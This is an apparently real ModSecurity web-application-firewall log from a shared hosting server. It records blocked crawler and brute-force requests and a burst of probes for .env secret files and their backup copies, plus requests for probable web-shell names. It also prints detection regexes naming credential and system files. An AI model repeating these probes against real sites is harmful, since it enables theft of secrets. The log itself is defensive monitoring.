[Tue May 26 13:18:05.174738 2026] [security2:error] [pid 501489:tid 501732] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQNGkFNZ9cRlz80IjXHwAAAPI"]
[Tue May 26 13:18:06.187386 2026] [security2:error] [pid 501489:tid 501671] [client 43.173.177.246:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "staging.unsobered.com"] [uri "/index.php"] [unique_id "ahVQNWkFNZ9cRlz80IjXRAAAALg"]
[Tue May 26 13:18:07.677885 2026] [security2:error] [pid 501489:tid 501665] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQN2kFNZ9cRlz80IjXcgAAALI"]
[Tue May 26 13:18:09.636863 2026] [security2:error] [pid 501489:tid 501700] [client 57.141.2.2:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQOWkFNZ9cRlz80IjXoQAAANU"]
[Tue May 26 13:18:12.275532 2026] [security2:error] [pid 501489:tid 501700] [client 113.189.106.43:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQO2kFNZ9cRlz80IjX4QAAANU"]
[Tue May 26 13:18:12.679482 2026] [security2:error] [pid 501489:tid 501655] [client 57.141.2.56:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQPGkFNZ9cRlz80IjX8QAAAKg"]
[Tue May 26 13:18:12.939259 2026] [security2:error] [pid 501489:tid 501724] [client 185.191.171.19:33574] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVQPGkFNZ9cRlz80IjYCQAAAOw"]
[Tue May 26 13:18:12.939368 2026] [security2:error] [pid 501489:tid 501724] [client 185.191.171.19:33574] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/cheer/list/"] [unique_id "ahVQPGkFNZ9cRlz80IjYCQAAAOw"]
[Tue May 26 13:18:15.420645 2026] [security2:error] [pid 501489:tid 501728] [client 57.141.2.10:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQPmkFNZ9cRlz80IjYTAAAAO8"]
[Tue May 26 13:18:15.421234 2026] [security2:error] [pid 501489:tid 501629] [client 142.248.80.72:37952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/app/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYZAAAAI8"]
[Tue May 26 13:18:15.421365 2026] [security2:error] [pid 501489:tid 501674] [client 142.248.80.72:37968] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/backend/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYcwAAALs"]
[Tue May 26 13:18:15.421397 2026] [security2:error] [pid 501489:tid 501664] [client 142.248.80.72:37930] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYdAAAALE"]
[Tue May 26 13:18:15.422092 2026] [security2:error] [pid 501489:tid 501699] [client 142.248.80.72:37964] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/api/.env"] [unique_id "ahVQP2kFNZ9cRlz80IjYcgAAANQ"]
[Tue May 26 13:18:15.554870 2026] [security2:error] [pid 501489:tid 501545] [remote 109.205.180.55:52184] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.180.205.109.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "haddingtonwines.com"] [uri "/wp-login.php"] [unique_id "ahVQP2kFNZ9cRlz80IjYWgAAtjc"]
[Tue May 26 13:18:16.486429 2026] [security2:error] [pid 501489:tid 501635] [client 23.95.117.253:61413] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "500"] [hostname "162.215.241.212"] [uri "/index.php"] [unique_id "ahVQP2kFNZ9cRlz80IjYXgAAAJU"]
[Tue May 26 13:18:16.941931 2026] [security2:error] [pid 501489:tid 501745] [client 4.201.75.230:2316] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/gelay.php"] [unique_id "ahVQQGkFNZ9cRlz80IjYpwAAAP4"]
[Tue May 26 13:18:17.060594 2026] [security2:error] [pid 501489:tid 501576] [remote 160.250.186.220:57798] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 220.186.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "vcresco.com"] [uri "/wp-login.php"] [unique_id "ahVQQGkFNZ9cRlz80IjYpQAA0VY"]
[Tue May 26 13:18:17.627873 2026] [security2:error] [pid 501489:tid 501686] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQQWkFNZ9cRlz80IjYtgAAAMc"]
[Tue May 26 13:18:18.604507 2026] [security2:error] [pid 501489:tid 501629] [client 142.248.80.72:37952] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.copy"] [unique_id "ahVQQmkFNZ9cRlz80IjY4wAAAI8"]
[Tue May 26 13:18:18.783678 2026] [security2:error] [pid 501489:tid 501725] [client 104.28.119.68:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "panda-eco.com"] [uri "/index.php"] [unique_id "ahVQQmkFNZ9cRlz80IjY4QAAAO0"]
[Tue May 26 13:18:19.340812 2026] [security2:error] [pid 501489:tid 501707] [client 142.248.80.72:38832] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.swp"] [unique_id "ahVQQ2kFNZ9cRlz80IjZCAAAANw"]
[Tue May 26 13:18:19.343901 2026] [security2:error] [pid 501489:tid 501628] [client 142.248.80.72:38842] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.orig"] [unique_id "ahVQQ2kFNZ9cRlz80IjZDAAAAI4"]
[Tue May 26 13:18:19.345544 2026] [security2:error] [pid 501489:tid 501738] [client 142.248.80.72:38806] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.backup"] [unique_id "ahVQQ2kFNZ9cRlz80IjZDgAAAPc"]
[Tue May 26 13:18:19.346028 2026] [security2:error] [pid 501489:tid 501682] [client 142.248.80.72:38828] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production~"] [unique_id "ahVQQ2kFNZ9cRlz80IjZDQAAAMM"]
[Tue May 26 13:18:19.422483 2026] [security2:error] [pid 501489:tid 501676] [client 142.248.80.72:38782] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.copy"] [unique_id "ahVQQ2kFNZ9cRlz80IjZEAAAAL0"]
[Tue May 26 13:18:19.422792 2026] [security2:error] [pid 501489:tid 501626] [client 142.248.80.72:38776] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.orig"] [unique_id "ahVQQ2kFNZ9cRlz80IjZEwAAAIw"]
[Tue May 26 13:18:19.423446 2026] [security2:error] [pid 501489:tid 501705] [client 142.248.80.72:38774] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.swp"] [unique_id "ahVQQ2kFNZ9cRlz80IjZFAAAANo"]
[Tue May 26 13:18:19.423511 2026] [security2:error] [pid 501489:tid 501735] [client 142.248.80.72:38724] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.copy$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1269"] [id "390586"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .copy)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.copy"] [unique_id "ahVQQ2kFNZ9cRlz80IjZFwAAAPU"]
[Tue May 26 13:18:19.423536 2026] [security2:error] [pid 501489:tid 501742] [client 142.248.80.72:38756] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.backup"] [unique_id "ahVQQ2kFNZ9cRlz80IjZFgAAAPs"]
[Tue May 26 13:18:19.423589 2026] [security2:error] [pid 501489:tid 501711] [client 142.248.80.72:38754] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.old"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGAAAAOA"]
[Tue May 26 13:18:19.426420 2026] [security2:error] [pid 501489:tid 501621] [client 142.248.80.72:38802] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.old"] [unique_id "ahVQQ2kFNZ9cRlz80IjZEgAAAIc"]
[Tue May 26 13:18:19.427368 2026] [security2:error] [pid 501489:tid 501655] [client 142.248.80.72:38768] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local~"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHwAAAKg"]
[Tue May 26 13:18:19.427439 2026] [security2:error] [pid 501489:tid 501652] [client 142.248.80.72:38666] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.backup"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHAAAAKU"]
[Tue May 26 13:18:19.427709 2026] [security2:error] [pid 501489:tid 501660] [client 142.248.80.72:38796] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.production.bak"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHQAAAK0"]
[Tue May 26 13:18:19.427711 2026] [security2:error] [pid 501489:tid 501639] [client 142.248.80.72:38654] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.bak"] [unique_id "ahVQQ2kFNZ9cRlz80IjZHgAAAJk"]
[Tue May 26 13:18:19.428208 2026] [security2:error] [pid 501489:tid 501702] [client 142.248.80.72:38716] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.orig$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1266"] [id "390584"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .orig)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.orig"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGQAAANc"]
[Tue May 26 13:18:19.428512 2026] [security2:error] [pid 501489:tid 501643] [client 142.248.80.72:38698] ModSecurity: Access denied with code 406 (phase 2). Pattern match "[a-z0-9]~$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1257"] [id "390581"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data Leakage - attempt to access backup file (disable this rule if you require access to files that end with a tilde)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env~"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGwAAAJ0"]
[Tue May 26 13:18:19.429164 2026] [security2:error] [pid 501489:tid 501744] [client 142.248.80.72:38638] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.old$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1263"] [id "390583"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .old)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.old"] [unique_id "ahVQQ2kFNZ9cRlz80IjZIAAAAP0"]
[Tue May 26 13:18:19.429271 2026] [security2:error] [pid 501489:tid 501748] [client 142.248.80.72:38700] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sw[a-z]$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1275"] [id "390587"] [rev "5"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .sw)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.swp"] [unique_id "ahVQQ2kFNZ9cRlz80IjZGgAAAQE"]
[Tue May 26 13:18:19.431040 2026] [security2:error] [pid 501489:tid 501688] [client 142.248.80.72:38740] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked - Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "traderscafe.in"] [uri "/.env.local.bak"] [unique_id "ahVQQ2kFNZ9cRlz80IjZIQAAAMk"]
[Tue May 26 13:18:19.642045 2026] [security2:error] [pid 501489:tid 501662] [client 57.141.2.45:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQQ2kFNZ9cRlz80IjY_gAAAK8"]
[Tue May 26 13:18:20.081616 2026] [security2:error] [pid 501489:tid 501631] [client 4.201.75.230:2319] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/god4m.php"] [unique_id "ahVQRGkFNZ9cRlz80IjZNAAAAJE"]
[Tue May 26 13:18:22.511988 2026] [security2:error] [pid 501489:tid 501692] [client 57.141.2.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQRmkFNZ9cRlz80IjZdAAAAM0"]
[Tue May 26 13:18:24.844067 2026] [security2:error] [pid 501489:tid 501711] [client 57.141.2.29:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQSGkFNZ9cRlz80IjZwwAAAOA"]
[Tue May 26 13:18:26.886386 2026] [security2:error] [pid 501489:tid 501643] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQSmkFNZ9cRlz80IjZ-AAAAJ0"]
[Tue May 26 13:18:27.710435 2026] [security2:error] [pid 501489:tid 501683] [client 4.201.75.230:2325] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/mari.php"] [unique_id "ahVQS2kFNZ9cRlz80IjaIAAAAMQ"]
[Tue May 26 13:18:28.781957 2026] [security2:error] [pid 501489:tid 501732] [client 4.201.75.230:2308] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/moon.php"] [unique_id "ahVQTGkFNZ9cRlz80IjaPAAAAPI"]
[Tue May 26 13:18:29.317278 2026] [security2:error] [pid 501489:tid 501745] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQTGkFNZ9cRlz80IjaPwAAAP4"]
[Tue May 26 13:18:31.678659 2026] [security2:error] [pid 501489:tid 501658] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQT2kFNZ9cRlz80IjahwAAAKs"]
[Tue May 26 13:18:31.753474 2026] [security2:error] [pid 501489:tid 501589] [remote 193.42.61.12:36148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 12.61.42.193.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "moes-art.com"] [uri "/wp-login.php"] [unique_id "ahVQT2kFNZ9cRlz80IjakgAAlWM"]
[Tue May 26 13:18:32.680873 2026] [security2:error] [pid 501489:tid 501710] [client 4.201.75.230:2305] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "mail.buysellcraft.com.md-74.webhostbox.net"] [uri "/o.php"] [unique_id "ahVQUGkFNZ9cRlz80IjatQAAAN8"]
[Tue May 26 13:18:32.839240 2026] [security2:error] [pid 501489:tid 501690] [client 114.119.138.207:51797] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/top-deejay-headphones/"] [unique_id "ahVQUGkFNZ9cRlz80IjavAAAAMs"], referer: http://coles-directory.com/computers_and_internet/entertainment/science_and_technology/recreation_and_sports/shopping/entertainment/reference/chats_and_forums/entertainment/magic/
[Tue May 26 13:18:34.916826 2026] [security2:error] [pid 501489:tid 501695] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQUmkFNZ9cRlz80Ija8AAAANA"]
[Tue May 26 13:18:36.863054 2026] [security2:error] [pid 501489:tid 501729] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQVGkFNZ9cRlz80IjbLQAAAPA"]
[Tue May 26 13:18:38.083043 2026] [security2:error] [pid 501489:tid 501657] [client 103.191.196.204:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVQVWkFNZ9cRlz80IjbTgAAAKo"]
